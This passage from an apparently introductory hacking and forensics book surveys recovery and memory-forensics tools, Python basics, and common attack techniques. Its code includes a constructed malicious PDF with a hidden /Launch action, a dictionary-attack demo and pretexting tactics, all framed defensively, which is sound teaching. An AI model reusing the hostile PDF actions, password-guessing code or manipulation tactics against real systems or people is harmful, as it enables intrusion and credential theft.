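        streams = [unescape_names(s) for s in decoded_streams(body)]
        yield num, unescape_names(body), streams


def find_suspicious(pdf):
    """Map object number -> sorted list of suspicious keys found in its
    dictionary or inside its decoded stream."""
    report = {}
    for num, body, streams in parse_objects(pdf):
        found = set()
        for hay in [body] + streams:
            for key in SUSPICIOUS:
                if re.search(re.escape(key) + rb"(?![A-Za-z])", hay):
                    found.add(key.decode())
        if found:
            report[num] = sorted(found)
    return report


def build_sample_pdf():
    """Constructed PDF: an auto-run JavaScript action with an escaped name,
    plus a /Launch action hidden inside a Flate-compressed stream."""
    hidden = zlib.compress(b"<< /Type /Action /S /Launch /F (cmd.exe) >>")
    parts = [
        b"%PDF-1.4\n",
        b"1 0 obj\n<< /Type /Catalog /Pages 3 0 R /OpenAction 2 0 R >>\nendobj\n",
        b"2 0 obj\n<< /Type /Action /S /J#61vaScript /JS (app.alert(1)) >>\nendobj\n",
        b"3 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n",
        b"4 0 obj\n<< /Length " + str(len(hidden)).encode()
        + b" /Filter /FlateDecode >>\nstream\n" + hidden + b"\nendstream\nendobj\n",
        b"trailer\n<< /Root 1 0 R >>\n%%EOF\n",
    ]
    return b"".join(parts)


if __name__ == "__main__":
    for num, keys in sorted(find_suspicious(build_sample_pdf()).items()):
        print("object %d: %s" % (num, ", ".join(keys)))
```

A plain text search of the same file would miss both the escaped /JavaScript name and the /Launch action inside the compressed stream, which is why the tool works object by object and decodes streams first.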
Dumpzilla
Dumpzilla is written in Python. Its purpose is to extract all forensically interesting information from web browsers such as SeaMonkey, Mozilla Firefox and Iceweasel.
ddrescue
ddrescue is a lifesaver of a tool. It copies data from one block device, such as a hard disk or a CD-ROM, to another. What makes it a lifesaver is that it copies the good parts first and only afterwards goes back to the areas that produced read errors, so a damaged source does not stall the whole copy.
Its basic operation is fully automatic: once started, it does not stop at prompts for errors, so you do not have to sit and wait in order to stop or restart the program.
Using the mapfile feature, data is recovered efficiently because only the blocks that are still needed are read. You can stop ddrescue at any time and resume it later from the same point.
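To make the mapfile idea concrete, here is an added example (not ddrescue's code) of the same strategy on a constructed, deliberately faulty device: a first pass copies every untried block and merely marks the ones that fail, a second pass retries the failures, and a dictionary standing in for the mapfile records each block's status so that an interrupted run can be resumed without re-reading what was already copied. The device class, the block size and the error pattern are all constructed for the example.

```python
BLOCK = 512


class FlakyDevice:
    """Constructed stand-in for a failing disk: blocks in `bad` never read,
    blocks in `flaky` fail once and then succeed."""

    def __init__(self, data, bad=(), flaky=()):
        self.data, self.bad, self.flaky = data, set(bad), set(flaky)
        self.reads = 0

    @property
    def nblocks(self):
        return (len(self.data) + BLOCK - 1) // BLOCK

    def read(self, n):
        self.reads += 1
        if n in self.bad:
            raise IOError("unrecoverable read error at block %d" % n)
        if n in self.flaky:
            self.flaky.discard(n)          # the next attempt will succeed
            raise IOError("transient read error at block %d" % n)
        return self.data[n * BLOCK:(n + 1) * BLOCK]


def rescue(src, dest, mapfile, max_blocks=None):
    """Copy `src` into the bytearray `dest`, driven by `mapfile`, a dict of
    block number -> '?' (not tried), '+' (copied) or '-' (read failed).
    Pass 1 copies untried blocks and skips over errors; pass 2 retries the
    failures. `max_blocks` aborts after that many reads, simulating an
    interruption; calling again with the same mapfile resumes."""
    budget = [max_blocks]

    def attempt(n):
        if budget[0] is not None:
            if budget[0] == 0:
                return False               # interrupted
            budget[0] -= 1
        try:
            chunk = src.read(n)
        except IOError:
            mapfile[n] = "-"
            return True
        dest[n * BLOCK:n * BLOCK + len(chunk)] = chunk
        mapfile[n] = "+"
        return True

    for n in range(src.nblocks):
        mapfile.setdefault(n, "?")
    for phase in ("?", "-"):               # good parts first, retries later
        for n in sorted(k for k, v in mapfile.items() if v == phase):
            if not attempt(n):
                return mapfile
    return mapfile


def summary(mapfile):
    """Counts of copied, failed and untried blocks."""
    return {s: sum(1 for v in mapfile.values() if v == s) for s in "+-?"}


if __name__ == "__main__":
    data = bytes(range(256)) * 8           # 2048 bytes = 4 blocks
    src = FlakyDevice(data, bad={1}, flaky={2})
    dest, mp = bytearray(len(data)), {}
    rescue(src, dest, mp)
    print(summary(mp), "reads:", src.reads)
```

Block 1 stays unreadable and is left zero-filled in the destination, block 2 is recovered on the retry pass, and a resumed run after an interruption reads only the blocks the mapfile still lists as untried or failed.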
Foremost
Have you ever deleted files, on purpose or by mistake, and realised later that you needed them? Foremost comes to your rescue. It is an easy-to-use open source package that retrieves data from disks that may have been formatted. It may not recover the file name, but it will recover the data the file held. A notable feature is that even when the directory information is lost, it can retrieve a file by looking for that file type's header and footer, which makes it a fast and reliable tool for data recovery.
An interesting fact: Foremost was developed by the US Air Force Office of Special Investigations.
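The added example below (not Foremost's code) carves PNG files out of a constructed raw image by header and footer, and shows why a careful carver does more than search for the footer bytes: PNG is built from length-prefixed, CRC-protected chunks, so the carver walks the chunks from the signature and stops at the IEND chunk, which survives a decoy footer planted inside a text chunk and rejects a bare signature that is not followed by valid chunks. The sample image and its contents are constructed for the example.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
IEND_FOOTER = b"IEND\xaeB`\x82"          # the IEND chunk type plus its fixed CRC


def png_chunk(ctype, data):
    """Encode one PNG chunk: length, type, data, CRC32 over type + data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack("!I", len(data)) + ctype + data + struct.pack("!I", crc)


def build_png(width=2, height=2, text=b""):
    """Constructed minimal valid PNG (8-bit RGB, solid red)."""
    ihdr = struct.pack("!IIBBBBB", width, height, 8, 2, 0, 0, 0)
    row = b"\x00" + b"\xff\x00\x00" * width        # filter byte + pixels
    chunks = png_chunk(b"IHDR", ihdr)
    if text:
        chunks += png_chunk(b"tEXt", b"Comment\x00" + text)
    chunks += png_chunk(b"IDAT", zlib.compress(row * height))
    chunks += png_chunk(b"IEND", b"")
    return PNG_SIG + chunks


def carve_png(blob, start):
    """Walk the chunks following a PNG signature at `start`, verifying each
    CRC, until IEND. Returns the carved bytes, or None if the structure does
    not hold together (a false-positive signature or a truncated file)."""
    pos = start + len(PNG_SIG)
    while pos + 12 <= len(blob):
        length = struct.unpack("!I", blob[pos:pos + 4])[0]
        ctype = blob[pos + 4:pos + 8]
        data = blob[pos + 8:pos + 8 + length]
        if len(data) < length:
            return None
        crc = struct.unpack("!I", blob[pos + 8 + length:pos + 12 + length])[0]
        if crc != (zlib.crc32(ctype + data) & 0xFFFFFFFF):
            return None
        pos += 12 + length
        if ctype == b"IEND":
            return blob[start:pos]
    return None


def carve_all(blob):
    """Find every PNG signature in the image and carve what follows it."""
    files, start = [], 0
    while True:
        start = blob.find(PNG_SIG, start)
        if start < 0:
            return files
        png = carve_png(blob, start)
        if png:
            files.append(png)
            start += len(png)
        else:
            start += 1


def naive_carve(blob, start):
    """Plain header-to-footer search, for comparison: stops at the first
    occurrence of the footer bytes, wherever they are."""
    end = blob.find(IEND_FOOTER, start)
    return None if end < 0 else blob[start:end + len(IEND_FOOTER)]


# Constructed "disk image": junk, a PNG whose comment contains a decoy footer,
# a bare PNG signature with garbage behind it, and more junk.
REAL_PNG = build_png(text=b"decoy " + IEND_FOOTER)
DISK_IMAGE = (b"\x00" * 40 + b"junk" + REAL_PNG + b"\x01" * 30
              + PNG_SIG + b"garbage" * 4 + b"\xff" * 20)

if __name__ == "__main__":
    for i, png in enumerate(carve_all(DISK_IMAGE)):
        open("carved_%d.png" % i, "wb").write(png)
```

Formats without internal structure (plain text, for instance) can only be carved between header and footer, which is why recovered files of those types sometimes come out truncated or with trailing junk.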
Galleta
Galleta parses the cookie files you have collected (it was written for Internet Explorer's cookie format) and converts them into a spreadsheet-friendly format, which can be exported for future reference.
Cookies can be evidence in a cyber-crime case, and they are hard to read in their original format. Galleta comes in handy here because it structures the data retrieved from cookies, which can then be run through other software for deeper analysis. Such analysis software needs its input data in a spreadsheet format, which is where Galleta proves very useful.
Volatility
When it comes to memory forensics, Volatility is a very popular tool. Written in Python, it extracts data from volatile memory such as RAM. It supports 32-bit and 64-bit versions of almost all Windows variants and a number of Linux and Android kernels. The tool accepts memory dumps in various formats, such as crash dumps, raw memory dumps, hibernation files, virtual machine snapshots and so on. It reconstructs the run-time state of the machine from the memory image alone, independently of the operating system that produced it.
Passwords and keys that have been decrypted at run-time reside in RAM. By retrieving them from the memory image, Volatility can be the saviour of an investigation that depends on encrypted or password-protected files on the hard disk, which cuts the overall time a case needs.
Autopsy
The Sleuth Kit is an open source digital forensics toolkit that works with a wide range of file systems, such as FAT, NTFS, EXT2 and EXT3 (and raw images), for in-depth analysis. The graphical interface developed for The Sleuth Kit (which is a collection of command line tools) is called Autopsy. Autopsy offers features such as hash filtering, timeline analysis, file system analysis and keyword searching. It is also very versatile, as it lets you add modules to the existing set for extended functionality.
When you launch Autopsy, you get the option to start a new case or open an existing one.
Xplico
Xplico is an open source tool for network forensics. If you wish to reconstruct the application data carried in captured network traffic, Xplico is the tool for you. Popular protocols such as HTTP, POP, SMTP, IMAP and SIP, over TCP and UDP, are supported, for both IPv4 and IPv6 (encrypted traffic such as HTTPS cannot be reconstructed without the keys). An SQLite database is used to store the tool's output.
Chapter 5 : Process of hacking and how attackers cover their traces

A computer, as a standalone piece of hardware, is not an intelligent machine. It is the programs written for it that determine what it can and cannot do. This chapter will teach you some of the basic principles of programming, as well as how to choose a programming language. At the end of the chapter you will find an exercise that helps you write a program in the Python language.
Why You Need to Learn a Programming Language to Hack
Computers operate using a series of switches. These electronic switches are turned on and off in different combinations, and this creates the functions of a computer. For a computer to turn a switch on or off, a program sends instructions in binary code. Binary code is a series of 1's and 0's, with 1 meaning on and 0 meaning off.
The problem with binary code is that it is incredibly hard for humans to work with. It would take even an advanced programmer a long time to interpret a program in binary, let alone alter it to do what they want. This is where a programming language comes in.
A compiler translates the commands of the programming language into the binary machine code the computer executes; an interpreter, such as Python's, reads the commands and carries them out directly.
A Few Considerations (and Key Terms) Concerning Programming Languages
To choose the best program to learn, you should consider what you want to do with your hacking/computer knowledge. Here are some common terms you may come across as you learn about the
different programming languages:
Language Generation
Generally speaking, as technology has advanced, so have computer languages. Currently, five generations of computer language are distinguished:
● First generation (1GL) languages were the most primitive. They were written directly in binary code (0's and 1's), which made them very hard to write.
● Second generation (2GL) languages are usually referred to as assembly languages. They were the first step that let programmers use symbolic names for instructions rather than raw binary.
● Third generation (3GL) was another advance, with higher-level languages like JavaScript, Java, C and C++. 3GLs let programs be written with commands and words closer to human language.
● Fourth generation (4GL) languages are closer still to human language. They are common for database access; some of the best known are SQL and ColdFusion.
● Fifth generation (5GL) is the most advanced category, in which the program is given constraints to satisfy rather than step-by-step instructions. The term is associated with artificial intelligence work, including neural networks, which imitate the workings of the human brain.

Procedure- vs. Object-Oriented Programming


Procedure-oriented programming uses a structured method. The problem (such as your hacking goal) is broken up into separate parts, each known as a procedure. A main program calls the individual procedures and lets them work together as needed. Commonly used procedure-oriented languages include C, FORTRAN and COBOL.
Object-oriented programming lets you define new data types, called classes, that bundle data together with the functions (methods) that operate on it. Classes can inherit from one another, so a new type reuses characteristics that have already been developed, which makes new data types easier to build. Common object-oriented languages include Java, C++ and PHP.

Before Step 1: Understanding the Structure of a Programming Language


Consider for a moment the parts of language that you learned in school. A programming language is structured much like the language you speak:
● Modules in programming are like chapters
● Procedures in programming are like paragraphs
● Lines of code in programming are like sentences
Within the lines of code, there are programming elements, including:
● Statements
● Declarations
● Methods
● Operators
● Keywords
Each of these elements works together to form a line of code that the computer can understand. The specific way the words are arranged, as well as which words are used, depends on the programming language you choose. Most hackers are familiar with at least one; many go beyond a single language to expand their knowledge and abilities.

Step 1: Learning to Write HTML


One of the most basic things to learn is HyperText Markup Language (HTML). You write text and then mark it up so that the browser displays it properly. Strictly speaking HTML is a markup language rather than a programming language, but because it is web-based and simple it is one of the best places to start. HTML uses basic English words that you are already familiar with. It is the simplest language to learn and provides a great foundation to build future knowledge upon.
Step 2: Learning Python Programming Language
Python is one of the preferred languages of hackers. This introduction will be brief, since learning a programming language properly takes an entire book or more. Python is incredibly powerful, yet it manages to remain simple: its clear syntax is what makes it easy to learn. Beyond that, all you need is the right vocabulary, and if you look around online you can easily learn the right words to make the program do what you want. From there it is a matter of using that vocabulary to write lines of code. You will get a peek at writing your first Python code at the end of this chapter.
Step 3: Learning Your Choice of Other Languages
Even though Python is one of the preferred programming languages, it is definitely not the only one. There are numerous programming languages, and most hackers choose to learn more than one, because each language has its limitations and there are times when you cannot do what you want with your preferred language. As you learn more languages, it becomes less likely that you will meet an obstacle you cannot overcome. Note that the list below is not all-inclusive.
Web Languages
These programming languages are typically used for creating/altering webpages. They are used for simple tasks like controlling how words are displayed, as well as complex ones like retrieving
data. Some of the most common web languages include:
● HTML- HyperText Markup Language is the most commonly used language for displaying text on a website. It is static, meaning the content does not change in response to program logic. Instead of controlling how a page behaves, HTML is limited to describing the content the page provides.
● Javascript- This language is used to create interactive, dynamic content. It allows form validation, animations, communication with servers, calculators and more.
● XML- Extensible Markup Language is similar to HTML but more general. It lets programmers define their own tags, and it is used to exchange data between different organisations and applications.
● Java- Java was long used to create applets, programs that run inside another program such as a browser (modern browsers no longer run them). Java can be used in software or on web pages to let users read files and interact with the program.
● PHP- This is one of the most widely used server-side web languages. Its tasks include form validation, access to databases, and encryption of data.

Software Languages
Software languages are used for creating programs that can be executed, from those that only print text on a screen to operating systems with any number of functions. Here are some of the most
common:
● Java- In addition to being a web language, Java works for software. It allows the creation of graphical programs, interactive user experiences, and more.
● Visual Basic- Visual Basic is a language created by Microsoft especially for writing Windows applications (VBScript is a related, lighter scripting dialect). It is a good choice if you do not yet have access to a Unix system.
● C Language- C is the language in which Unix and Linux themselves are written. It is complex, but it allows the development of almost any kind of software, from games to engineering and business programs.
● C++- C++ is a descendant of C and is similar to it. It is commonly used for graphical applications. Rather than being procedure-based like C, it adds object-oriented programming.

Real World Example: A Guide for Writing Codes and Programs Using Python
Step 1: Downloading and Installing Python and Other Essential Programming Elements
You can install Python from the Python website; choose the latest interpreter for your operating system. Python runs on Windows, OS X and Linux. If you run OS X or Linux, Python is probably already installed, though you may still want a newer version from the Python website, particularly if your system is more than a few years old.
The download from the Python website is the interpreter: the program that reads your source code and carries out its instructions, which also includes an interactive shell. Besides it, you need a text editor. Pre-installed programs like TextEdit or Notepad will work, but it is easier to read and write code in a programmer's editor such as jEdit, TextWrangler or Notepad++.
Step 2: Learning the Basics and Writing Your First Program
With an interpreter, a high-level language like Python is easy to use. Still, you can make programming (and later hacking) easier by knowing the basics of the language, and the easiest way to learn them is to start programming, so start Python and open the interpreter. The notes in this section are based on
https://www.stavros.io/tutorials/python/
Properties
Python is a typed language, which means that types are enforced. It is implicitly and dynamically typed, which means that variables do not need to be declared. It is case sensitive, so name and NAME are two separate variables with different meanings. Python is also object-oriented, which means that everything in it is an object.

Getting Help
You can always get help from the Python interpreter. If you want to know how a specific object works, type help(object) in the interpreter. Other useful commands are dir(object), which lists the attributes and methods of an object, and object.__doc__, which shows the documentation string of an object.
Syntax
In Python there are no mandatory statement terminators, and code blocks are marked by indentation. A statement that introduces an indented block ends with a colon (:). Comments begin with #; a comment is a note to yourself or to another reader about what the code does. A documentation string (a string literal placed as the first statement of a module, function or class) can span several lines. We use the = operator to assign a value and == to test equality. To increase or decrease a value in place we use the += and -= operators; += also works on strings (where it appends) and on lists.
Data Types
Python has several built-in data types, including tuples, lists and dictionaries; sets are built in too, as the set type. Lists are one-dimensional arrays, although a list can contain other lists. A dictionary is an associative array and a tuple is a one-dimensional array that is immutable, i.e. it cannot be changed. Elements may be of any type, so types can be mixed: a single list, tuple or dictionary can hold strings, integers and other objects. The first item is at index 0, and negative numbers count from the end, with -1 being the final item.
Ranges of an array are accessed using a colon (slicing). Leaving the start index empty means the first item; leaving the end empty means the last item. Slicing is inclusive-exclusive, so 3:9 returns items 3 (the fourth item, since 0 is the first) through 8 (the ninth item).
Strings
Python strings may be enclosed in single or double quotes, and one kind of quote may appear inside a string delimited by the other; "She said 'Hello'." is a valid string. Multiline strings are enclosed in triple quotes, either single (''') or double ("""). To put values into a string, the classic way is the modulo (%) operator with a tuple: each % placeholder is replaced by the corresponding item of the tuple, from left to right, and substitutions from a dictionary can be used as well.
Flow Control Statements
The flow control statements are while, if and for. There is no switch; use if in its place. for iterates over the members of a list (or any other iterable).
Functions
A function is declared with the keyword def. Optional arguments are listed after the mandatory ones in the declaration and are given a default value there. When calling a function we can use named (keyword) arguments by assigning a value to the argument name. Functions may return tuples, and lambda functions are ad hoc functions made up of a single expression. Arguments are passed by object reference: a mutable object such as a list can be changed by the function, while immutable types such as ints, tuples and strings cannot. What is passed is a reference to the object; when you bind a new object to a name, the old binding is discarded.
Classes
Python classes support multiple inheritance. A variable or method is made private (through name mangling) by giving it a name with two or more leading underscores and at most one trailing underscore.
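The following added example, written for this section rather than taken from the tutorial it is based on, exercises the points above in runnable form: inclusive-exclusive slicing, % substitution from a tuple and from a dictionary, optional and named arguments, a function returning a tuple, the difference between passing a mutable list and an immutable int, a lambda, and a class whose double-underscore attribute is name-mangled. The Account class and the sample values are constructed for the example.

```python
def slicing_demo():
    """Indexing and inclusive-exclusive slicing on a list."""
    items = list(range(10))                  # [0, 1, ..., 9]
    return items[3:9], items[-1], items[:3], items[7:]


def format_demo(name, count):
    """% substitution: positional from a tuple, or by name from a dict."""
    by_tuple = "%s has %d messages" % (name, count)
    by_dict = "%(name)s has %(count)d messages" % {"name": name, "count": count}
    return by_tuple, by_dict


def greet(name, greeting="Hello", punctuation="!"):
    """Optional arguments follow the mandatory one and carry defaults; callers
    may set them by name."""
    return "%s, %s%s" % (greeting, name, punctuation)


def min_max(values):
    """A function can hand back several values as a tuple."""
    return min(values), max(values)


def mutation_demo():
    """Arguments are passed by object reference: the list passed to add_item
    is changed in place, while increment rebinds its own name and leaves the
    caller's int untouched."""
    def add_item(lst):
        lst.append("added")

    def increment(n):
        n += 1
        return n

    shopping = ["milk"]
    add_item(shopping)
    counter = 1
    increment(counter)
    return shopping, counter


class Account(object):
    """Two leading underscores trigger name mangling: __balance is stored as
    _Account__balance, which discourages (but does not prevent) outside use."""

    def __init__(self, owner, balance=0):
        self.owner = owner
        self.__balance = balance

    def deposit(self, amount):
        if amount <= 0:
            raise ValueError("deposit must be positive")
        self.__balance += amount
        return self.__balance

    def balance(self):
        return self.__balance


square = lambda x: x * x                     # a lambda is a one-expression function

if __name__ == "__main__":
    print(slicing_demo())
    print(greet("Bob", punctuation="?"))
    print(mutation_demo())
    acct = Account("alice", 10)
    print(acct.deposit(5), acct.balance())
```

Try help(Account) and dir(acct) in the interpreter on these objects: dir shows the mangled _Account__balance name, which is exactly why "private" in Python is a convention rather than a guarantee.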
Hacking Techniques & Tactics
Understanding the techniques hackers use to access your information without permission gives you insight into how this is possible, as well as what you can do to protect yourself from the most basic attacks. With this knowledge you can also go further into hacking if you wish to develop your skills and learn how to create your own programs and software.
Keylogger
A keylogger is a simple piece of software designed to track and record each keystroke made by the user of a computer. The keystrokes are stored in a log file that the hacker retrieves and from which they pick out your information: email IDs, passwords, banking details, credit card numbers and virtually anything else you typed on the keyboard. For this reason many online banking sites and other high-security pages use virtual keyboards and even image-based passcodes to grant access to your account, since plain keystroke logging cannot capture these (a keylogger that also records screenshots or mouse clicks can, however, so they are not a complete defence).
How do keyloggers get onto your computer in the first place? They are often attached to files that are downloaded onto your computer without your knowledge, known as Trojans (after the Trojan Horse of Greek mythology). Once run, they get to work and report back to the hacker with the information collected from your computer. They can also be placed on the computer directly, by someone who has been given access to the machine and permission to install things, or through a USB drive they have handed you with hidden files inside.
Keyloggers are also used for white hat purposes, for example within organisations to check that employees follow the correct policies and procedures and are not engaging in deceptive conduct.
Denial of Service (DoS/DDoS)
One of the most common forms of attack is the Denial of Service, which we mentioned earlier. It involves making a website or service unusable. The site is taken down by flooding it with traffic and requests, enough to overload the system as it struggles to process them all, until it is overwhelmed and crashes. These attacks are employed by hackers who want to disrupt websites or servers, whatever their reason or motivation. For example, a hacktivist might take down a website that disagrees with their political views, seeing it as a moral duty, whereas a black hat hacker might take down the website of a competing organisation to disrupt its services and sabotage its efforts.
A Distributed Denial of Service (DDoS) attack is carried out using a botnet, a network of infected systems used like an army of zombie machines that all send requests to the target at once, overloading it. These systems are infected through malicious emails and software, and once infected, the zombie computers can be commanded at will by the hacker. Industry surveys have reported that up to 45% of organisations suffer DDoS attacks, resulting in millions of dollars' worth of damage each year.
Vulnerability Scanner
To detect weaknesses within a computer network, hackers use a tool known as a vulnerability scanner. A related tool is the port scanner, which scans a specific computer for open ports that the hacker could use as a way in. A port scanner can also determine what program or service is listening on a given port, which gives the hacker further useful information. Firewalls are designed to block unauthorised access to these ports; however, a firewall reduces exposure rather than being a sure-fire way to stop hackers.
Some hackers find weaknesses manually rather than with a program, by reading the code of a system and testing it to see whether they can obtain access. If the source code is not available, they can reverse engineer the program to recover its logic.
Brute Force Attack
If you have ever wondered why you get only a limited number of chances to enter your password before being denied access, it is because the server you are trying to reach has a safeguard against brute force attacks. A brute force attack uses software that tries to recover the password by running through a dictionary, or through generated combinations of characters, as fast as the target allows until it hits the right password and gains access. For this reason, password rules have become stricter than they once were: passwords are longer and more complex, mixing symbols, numbers and upper- and lower-case letters, and some systems go as far as barring words found in the dictionary.
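The added example below (constructed for this section, not code from the book) shows both sides of the paragraph: a login service that locks the account after a fixed number of consecutive failures, a dictionary attack against it that is cut off by the lockout, and the same attack run offline against a stolen salt and hash, where no lockout applies and only the cost of the hash function slows the attacker down. The service, the wordlist and the password are constructed; the iteration count is kept deliberately low so the example runs quickly.

```python
import hashlib
import hmac
import os

# Deliberately low so the demo is fast; real deployments use far higher counts
# (or memory-hard functions) precisely to slow offline guessing.
ITERATIONS = 1000


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256. Returns (salt, digest)."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


class LoginService:
    """Online login with a lockout after `max_attempts` consecutive failures
    (None disables the lockout)."""

    def __init__(self, username, password, max_attempts=5):
        self.username = username
        self.salt, self.digest = hash_password(password)
        self.max_attempts = max_attempts
        self.failures = 0
        self.locked = False

    def login(self, username, candidate):
        if self.locked:
            return "locked"
        _, cand = hash_password(candidate, self.salt)
        if username == self.username and hmac.compare_digest(cand, self.digest):
            self.failures = 0
            return "ok"
        self.failures += 1
        if self.max_attempts is not None and self.failures >= self.max_attempts:
            self.locked = True
        return "denied"


def online_dictionary_attack(service, username, wordlist):
    """Try each word against the live service; give up once locked out."""
    for word in wordlist:
        result = service.login(username, word)
        if result == "ok":
            return word
        if result == "locked":
            return None
    return None


def offline_dictionary_attack(salt, digest, wordlist):
    """With a stolen salt and hash there is no lockout to stop the attacker;
    the only brake is how expensive each hash computation is."""
    for word in wordlist:
        if hmac.compare_digest(hash_password(word, salt)[1], digest):
            return word
    return None


# Constructed wordlist; the real password sits beyond the lockout threshold.
WORDLIST = ["123456", "password", "qwerty", "letmein", "dragon",
            "baseball", "football", "monkey", "sunshine", "iloveyou"]

if __name__ == "__main__":
    svc = LoginService("alice", "sunshine", max_attempts=5)
    print("online:", online_dictionary_attack(svc, "alice", WORDLIST), "locked:", svc.locked)
    print("offline:", offline_dictionary_attack(svc.salt, svc.digest, WORDLIST))
```

The lockout is what makes online guessing impractical, but it does nothing once the password database has been stolen, which is why the slow, salted hash matters as much as the attempt limit.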
Waterhole Attacks
Watering hole attacks take their name from predators that wait where their prey gathers to drink. In the usual sense of the term, the hacker compromises a website that a target group is known to visit regularly, so that the site itself serves the victims malicious content. The same idea applies to physical places where many people connect and exchange sensitive information, such as a coffee shop, a coworking space or a public Wi-Fi access point: an attacker who controls or watches the network there can track your activity, the websites you visit and the times you access your information, and redirect you to a false web page that captures what you enter, to be used later at the hacker's leisure. When using public Wi-Fi, make sure your anti-spyware and antivirus software is up to date so that it can alert you to suspicious activity, and prefer encrypted (HTTPS) connections.
False WAP
Similarly to the waterhole attack, the hacker can use software to create a fake wireless access point. The fake WAP is connected to the official public wireless access point; however, once the victim
connects they are exposed and vulnerable, in that their data can be accessed at any point and stolen. When in public spaces, ensure that the WAP you are using is the correct one; the genuine one will
generally require a password prior to access, or a portal which requires you to enter a username, email address and password obtained from the administrator. If you find the access point is
completely open, this could be cause for alarm, as the point is likely bait.
Phishing
Another common technique used by hackers to obtain secure information from an unsuspecting victim is phishing. Phishing involves a hacker creating a link that you would normally
associate with a site that you commonly access, such as a banking site or payment portal. However, when you input your details, they are sent to the hacker rather than the institution that you
believe you are sending them to. Phishing is often done by sending false emails that appear to be from your bank or billing institution and generally request that you
access your account to either update your details or make a payment.
There are ways to tell whether you are being targeted for phishing, such as checking the sender's ID (which can still be falsified) or checking the details of the link that you have been
provided and seeing that it doesn't match the usual site where you fill in your details. You may also notice formatting issues with the email, such as logos out of place or poor layout, that
would indicate that the phisher is not using the correct template. Many institutions will state that they would never request your details through email or ask you to update your details. If you do
receive your bill through email and feel suspicious, you can compare it with previous billing emails or even call your institution to double check that the email is genuine.
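The link check described above can be automated. As an added example (not from the book), the following Python script extracts the links from a constructed HTML email and flags any whose real destination is on a different domain from the institution the mail claims to come from, or whose visible text names a different host than the href actually points to. The sample email, the domain names and the simple two-label domain reduction are assumptions made for this example.

```python
"""Flag phishing-style links in an HTML email: the link's real destination
does not match the institution it claims to be, or the visible text names a
different host than the href. Added example; the sample email is constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the first link's text claims the bank, its href does not.
SAMPLE_EMAIL = """
<p>Dear customer, please <a href="http://examplebank.com.account-verify.example.net/login">
log in at www.examplebank.com</a> to update your details.</p>
<p>Or view your bill at <a href="https://billing.examplebank.com/statement">billing.examplebank.com</a>.</p>
"""


class _LinkParser(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join(self._text).strip()))
            self._href = None


def registrable_domain(host):
    """Reduce a host to its last two labels (billing.examplebank.com -> examplebank.com).
    Assumption for this example; real deployments use the Public Suffix List."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def host_in_text(text):
    """Pull a hostname out of the visible link text, e.g. 'log in at www.examplebank.com'."""
    for token in text.replace(",", " ").split():
        token = token.strip("./")
        if token.startswith("http"):
            return urlparse(token).hostname
        if "." in token:
            return token.lower()
    return None


def check_links(html, expected_domain):
    """Return a list of (href, reason) for links that look like phishing.
    expected_domain is the institution the mail claims to come from."""
    parser = _LinkParser()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        real_host = urlparse(href).hostname or ""
        real_dom = registrable_domain(real_host)
        if real_dom != expected_domain.lower():
            # The link leaves the claimed institution entirely.
            findings.append((href, f"points at {real_dom}, not {expected_domain}"))
            continue
        shown = host_in_text(text)
        if shown and registrable_domain(shown) != real_dom:
            # Visible text names one host, the href goes to another.
            findings.append((href, f"text shows {shown} but link goes to {real_host}"))
    return findings


if __name__ == "__main__":
    for href, why in check_links(SAMPLE_EMAIL, "examplebank.com"):
        print(f"SUSPICIOUS: {href}\n  {why}")
```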
Clickjacking Attacks
If you have ever attempted to stream a video on a less reputable site, you may have noticed that the interface can be quite confusing to navigate due to false play buttons or familiar-looking sections
which, when you click on them, redirect you somewhere else. These are known as clickjacking attacks, or UI redress. While redirecting to an ad or another page may seem harmless,
when done correctly these attacks can be quite sinister and potentially dangerous, as they are able to capture your information. You need to exercise extra caution when using unfamiliar websites,
as they may not be as safe as they appear, with their interface taking you to a place right where the hacker wants you. Always be aware of the URL of each click you make, and if it differs
drastically from the website that you were just on, ensure that where you are taken does not involve any downloads or exchange of details, for your own protection.
Bait and Switch
The bait and switch technique involves the hacker supplying you with a program that appears to be authentic but which is in fact a virus or a tool used by the hacker to access your computer.
These can generally be found on unscrupulous websites that offer pirated programs, software, movies or games that are in high demand. Once you download the program, you will find that the
file is not what you had intended and has instead loaded a virus onto your computer to provide the hacker with access.
Social Engineering
We mentioned earlier the social engineering techniques used by white hat hackers. This technique is often overlooked as a means of hacking; however, it can be quite effective. An example of
social engineering is conning a system administrator into supplying details by posing as a user or an individual with legitimate access. These hackers are often thought of as con men rather than
what we understand to be hackers; however, it is a means of hacking nonetheless. Many of these hackers have a good understanding of the security practices of the organization that they are
attacking. The employee they target may be less experienced, or hold a lower level of security clearance, than some of the higher-ups. For example, they may phone up the employee on the helpdesk and request access
to the system, and the employee, without the experience to understand the consequences of providing information to an unknown source, gives it up. There are a number of categories that social engineering can
be placed in, these being:
Intimidation - An example of intimidation would involve a hacker posing as a superior such as a manager or supervisor, calling the help desk technician, angry and threatening to punish the technician if their
authority is questioned. Under pressure, the employee will comply and provide the information. Their questioning of the authority is promptly shut down as the employee values their job and
offers to assist the hacker in securing the information.
Helpfulness - On the opposite end of the spectrum, there is the helpfulness technique. This involves feigning distress and concern to take advantage of a technician's nature to offer help and
compassion. Rather than acting angry and placing pressure on the technician, the distressed hacker will act as though they themselves are under pressure and worried about the outcome. The
technician will provide assistance in any way they can without considering the consequences, so as not to cause the caller further distress.
Name-dropping - Having the name of an authorised user provides the hacker with the advantage that they can pretend to be a specific person who should rightly have access to the information.
Such names can be sourced from company web pages, which can be easily found online. Another example is searching through documents that have been improperly
discarded, which can provide vital details to the hacker.
